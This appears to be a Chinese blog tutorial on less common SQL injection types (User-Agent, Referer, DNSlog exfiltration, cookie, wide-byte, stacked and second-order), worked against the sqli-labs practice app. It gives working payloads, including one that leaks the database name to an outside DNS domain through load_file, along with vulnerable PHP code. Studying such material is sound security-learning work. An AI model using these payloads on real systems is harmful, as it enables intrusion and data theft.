SQL注入的剩余类型

除了联合查询注入,报错注入,盲注注入 sql注入还有以下几类

SQL注入的剩余类型_第1张图片

开始填坑              SQL注入的剩余类型_第2张图片

1.UA注入 

原理:有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息,
此时就有可能存在UA 头注入,一般会把数据插入到某张表中所以可以用报错注入

就像sqli的第18关

SQL注入的剩余类型_第3张图片

在这里我们可以尝试ua头注入,先找回登录的包 

SQL注入的剩余类型_第4张图片

一个引号报错,两个不报错 ,--->字符型注入

SQL注入的剩余类型_第5张图片

但是!!!!   这里的注入姿势又和select 不同,因为这里已经不是select了

所以就要有新的poc ,这里提供两个,以及查看其最终的效果

1.在括号内进行构造

' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

2.注释掉后面的值

',1,extractvalue(1,concat(0x7e,(select database()),0x7e)));#

SQL注入的剩余类型_第6张图片

这,就是ua注入

2.refer注入

原理:当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器
的,
大部分网站或者app都会写入数据库用来分析量从哪里来,以及统计广告投入的成本,
一般会把数据插入到某张表中所以可以用报错注入

所以这个好像和ua注入差不多,那就上poc吧

'and extractvalue(1,(concat(0x7e,(select database()),0x7e))))#
'and extractvalue(1,(concat(0x7e,(select database()),0x7e))) and '

这样都是可以的

SQL注入的剩余类型_第7张图片

3.Dnslog外带

原理:将dnslog平台中的特有字段payload带入目标发起dns请求,通过dns解析将请求后的关键信息组合成新的三级域名带出,在dns服务器的dns日志中显示出来。

但是前提得是:

  • 需要root权限
  • 需要Windows的操作系统
  • secure_file_priv为空

操作如下

先去找一个dns解析的网站

SQL注入的剩余类型_第8张图片

然后构造这样一个poc

http://127.0.0.1/sqli/Less-1/?id=1' and (select load_file(concat('\\\\',(select
database()),'.你的dns解析的域名/abc'))) --+

这样就能将他的数据库名字返回了 ,如果你想爆user()的话,记得在之前加上hex() 得到结果再进行解码

4.Cookie注入

虽然不知道为什么,但是总有一些逆天cookie长这个样子

SQL注入的剩余类型_第9张图片

cookie注入的原理:对get传递来的参数进行了过滤,但是忽略了cookie也可以传递参数

所以我们就可以这样 

'and extractvalue(1,concat(0x7e,(select database()),0x7e))#

SQL注入的剩余类型_第10张图片

5.宽字节注入(锟斤拷

一般什么时候会发生宽字节注入呢? 当数据库采用GBK编码但是PHP又采用UTF-8编码的时候,而且还采用了一些关键词过滤函数就会发生宽字节注入 

没听懂?      SQL注入的剩余类型_第11张图片  来给你举个例子

假如有一个url=  127.0.0.1/sqli/less1/?id=1

那我们不用想,肯定是sql注入 单引号一套上去 但是你就会发现 ’ 变成了 /'  这就是强大的addslashes()函数的功劳了 ,但是,道高一丈,魔高一尺 我们可以抓住规则的漏洞!!

数据库不是GBK编码吗,我们能不能加点东西,让/变成一个 汉字 这样我们就实现了’的逃逸

我们只要找一个ascii码值大一点的数,将/和这个数让数据库一位是一个汉字就能实现绕过

我们常用%df,就是这样

SQL注入的剩余类型_第12张图片

那剩下来拿数据那些就简单了,很熟悉对吧!!

SQL注入的剩余类型_第13张图片

6.堆叠注入

堆叠,顾名思义,就是一堆的东西一起注入,上案例!!sqli的38关

这关感觉平平无奇,即使一个普通的字符串注入,但是我们去看一下源码??

SQL注入的剩余类型_第14张图片

暗藏玄只因鸡   开始代码审计!!!!

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '';	
            printf("Your Username is : %s", $row[1]);
            echo "
"; printf("Your Password is : %s", $row[2]); echo "
"; echo "
"; } // mysqli_free_result($result); } /* print divider */ if (mysqli_more_results($con1))
  • 首先它的sql接受语句还是啥都没过滤,可以直接注入了
  • 然后他居然有一个 mysqli_multi_query($con1, $sql)函数,这个函数允许进行多次查询,也就是造成堆叠注入的根源!!!!!!(红队人员狂喜!!)
  • SQL注入的剩余类型_第15张图片

于是就可以构造poc

1'; insert into users(username,password) values("遇到堆叠注入","红队人员狂喜");--+

直接看第十六条数据,嘿嘿!!

SQL注入的剩余类型_第16张图片

7.二次注入

如果要完成二次注入,你就必须知道一个真实人员的账号假设有一个admin 密码也是admin

首先,我们注册一个用户名字为admin'# 密码为123 

然后,我们去改密码为123456就会发现 

SQL注入的剩余类型_第17张图片

登不进去了SQL注入的剩余类型_第18张图片

反而密码变成了我们改的密码123456

这是因为update的原因 我们用admin’# 改密码的时候,发生了这样一个poc

update users password ="123456" where username="admin'#"

可以看到 admin后面的 '刚好完成了闭合 并且用#将后面的"注释掉了 

这就是二次注入的魅力 基本不存在注入(如果你把admin'#也过滤那就没办法了),但是我在二次尝试的时候就形成了注入

以上就基本上是sql注入的一些方法了, 吐槽一句 好nm的冷啊啊啊啊啊啊啊啊啊啊啊啊啊

                                                         SQL注入的剩余类型_第19张图片

你可能感兴趣的:(sql,mybatis,数据库)